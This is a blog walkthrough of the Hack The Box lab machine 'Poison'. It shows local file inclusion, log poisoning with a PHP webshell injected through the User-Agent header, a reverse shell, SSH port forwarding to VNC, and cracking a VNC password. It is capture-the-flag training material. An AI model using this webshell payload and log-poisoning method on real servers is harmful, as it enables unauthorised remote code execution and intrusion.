Hack The Box — Poison

Poison is a Medium difficulty rated Linux machine on Hack The Box and a part of OSCP prep list of TJ Null.In this box we mainly perform log poisoning attack for getting LFI to RCE and privilege escaalate using vnc.

ENUMERATION

port 22 and 80 are open.Port 80 seems to host some .php files as listed below.You can visit them one by one

listfiles.php seems to show a file within the server called pwdbackup.txt

Lets access pwdbackup.txt by using file=pwdbackup.txt in the url.It seems base64 encoded and in the firsy line, it is clearly mentioned that it is base64 encoded 13 times and thus we need to decode it.

To do so, it is suggest to use a script that does this task.You can also try looking fir a python/bash script or create your own.

We can base64 decode a string using base64 -d option what if we do this 13 times

We used ( | ) pipeline to transfer the output to the next command and i found this interesting trick from a random writeup of this box.

cat base64.txt | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d

we ran base64 -d command 13 times and got the password

We can also use a simple bash script to do this task.

data=$(cat base64.txt); for i in $(seq 1 13); do data=$(echo $data | tr -d ‘ ‘ | base64 -d); done; echo $data

Here seq(1 13) is used to loop 13 times.

and we got the password.

Now there are 2 ways to solve this machine and i will cover both of them.

1) USING SSH

We have already found a password above and ssh is open in our target.Moreover there is Local File Inclusion vulnerablity on the machine and we are able to read the /etc/passwd file.

There seems to be a user called charix, even the password contained charix and the guy who made this box also has a username called charix.We can simply ssh to charix and use the password we had found above.

and we are in !!!

Now i will cover the second method “log poisoning” which is the intended way to solve this machine since the name of this machine is “poison”

2) LOG POISONING

Very simply said, log poisoning is a method of getting LFI to RCE.The way it works is that the attacker attempts to inject malicious input to the server log. Then using the LFI vulnerability, the attacker calls the server log thereby executing the injected malicious code which gives reverse shell.For more info, you can refer this article-https://dheerajdeshmukh.medium.com/get-reverse-shell-through-log-poisoning-with-the-vulnerability-of-lfi-local-file-inclusion-e504e2d41f69

As we can see below, a LFI exists and we can view etc/passwd

Using google, we find that the location of log files in freebsd is

/var/log/httpd-access.log

and we are also able to access the log file through LFI.

In the image given below, do Notice that the user agent “Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0” is being logged. Since the user agent is something that is completely in our control, we can simply change it to send a reverse shell back to our machine.All you have to do is intercept the request using burp

and now change the “User-Agent” field to a one liner reverse shell.Always put the reverse shell within the cmd field.

<?php shell_exec($_REQUEST[‘cmd’]);?>

Here we are using exec() instead of shell_exec() you can also try using system()

Now after editng the user agent, forward the request and in the response(on right side of burp)you will clearly see that we have injected code

Now all we have to do is start a netcat listener and run the log file by accessing it.This will execute the command in the log file and give us reverse shell

NOW, FINALLY SINCE WE HAVE A LOW LEVEL SHELL, LETS CONTINUE

We find a zipped file called secret.zip on the target,We can unzip it using the unzip command however we get nothing.

Lets transfer the secret.zip file to our kali so we can take a deeper look at it.For transferring file from linux to linux, we can use scp. Now if we unzip it and run the command file secret (to find what type of file is secret)it shows us that it is encoded (Non-ISO extended-ASCII text, with no line terminator)

Lets run ps aux command on the target to see what processes are running

and we immediately see a process called Xvnc running as root

Vnc is a graphical Remote Access Software,if we can connect to it, we can graphically access our target. Below, we run the ps aux | grep vnc to make sure that vnc indeed is running and pull it out of all the results.

we run the netstat -an command to look for local listening ports and see that the target is listening on port 5801 and 5901

A simple google search shows us that VNC uses port 5900+ The results above show that our target is listening on port 5901.

We want to connect to VNC running on our target BUT we cannot do it directly due to firewall which can block us. Lets use Local port forwarding to forward our target’s vnc port 5901 to our kali’s port 5000. To do so we run the following command

ssh -L [local-port]:[remote-ip]:[remote-port]
ssh -L 5000:127.0.0.1:5901 charix@10.10.10.84

LOCAL PORT FORWARDING USING SSH

The above command allocates a socket to listen to port 5000 on localhost from my attack machine (kali). Whenever a connection is made to port 5000, the connection is forwarded over a secure channel and is made to port 5901 on localhost on the target machine (poison).

Lets run the netstat -an command again on our target and we see that it is listening on port 5000 .We did this just to check that our work is done.

Finally lets connect to vnc running in our kali’s port 5000.To access vnc, we use vncviewer which comes pre installed in kali.When it asks for password, we try using our previous charix password(which we also used in ssh) however it fails!

The reason we have use 127.0.0.1 in the ip is because vnc is running locally in our kali’s port 5000 because we used port forwardng.

If you google vnc password,you will find that in the vncviewer tool, we can specify a password by using -passwd option

Lets use the secret file which we had found earlier as the password and it works!!! (i found this very tricky as well)

and we are finally connected to VNC and can grab the root flag

BONUS (Decrypting VNC Password)

Since we know that the secret file contains the hidden password, why not find whats inside the secret file and uncover the password in plain text.To crack the secret file, we can use a python script on github. This script can decrypt vnc password files

Once downloaded, just run it with the -d (decrypt) and -f (file) options

The vnc password is VNCP@$$!

CONCLUSION

I hope you learned a lot from this writeup.This machine was really informative. We learned about LFI to RFI using Log Poisoning attack, Local port forwarding and connecting to vnc and decrypting vnc password.I would like to give credits to Rana Khalil for here informative writeup.

Make sure you follow me here on Medium for more such oscp like writeups and articles.Until next time -ZEUS

--

--

--

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ZeusCybersec

ZeusCybersec

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

More from Medium

Hack The Box — Bastion

HTB: Backdoor Walkthrough

My First CTF (PicoCTF) — Obedient Cat!

HacktheBox [Toolbox]